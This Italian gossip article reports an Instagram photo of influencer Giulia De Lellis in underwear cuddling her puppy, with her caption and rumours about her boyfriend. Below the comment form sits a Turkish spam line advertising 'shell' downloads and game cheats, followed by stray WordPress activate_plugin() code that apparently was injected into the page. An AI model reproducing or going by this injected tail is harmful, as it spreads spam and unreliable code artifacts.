Giulia De Lellis sempre sexy, mezza nuda sul letto: coccole con il suo amico speciale



Giulia De Lellis continua a far parlare di sè, senza svelare troppi dettagli sulla sua vita privata. Nell’ultimo scatto pubblicato su Instagram l’influencer ha deliziato i suoi quasi 5 milioni di followers facendosi immortalare in intimo sul letto, mentre si abbandona alle coccole con il suo amico speciale, vale a dire il suo cagnolino.

 

 

Così la De Lellis scrive nella didascalia che accompagna l’immagine: “Ultimamente mi sveglia mentre dormo. Ha imparato a saltare sul letto, a scendere da solo dal divano. Niente, ormai è diventato proprio grande. Quasi un anno il mio piccolo”, ha sottolineato, evidenziando quindi il marchio dell’intimo che indossa. Lei è sempre sexy, mentre si rincorrono le voci circa il suo fidanzamento con il rampollo milanese Carlo Beretta. Sulla coppia c’erano già le prime voci di crisi, ma secondo i bene informati la storia starebbe proseguendo senza particolari intoppi.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );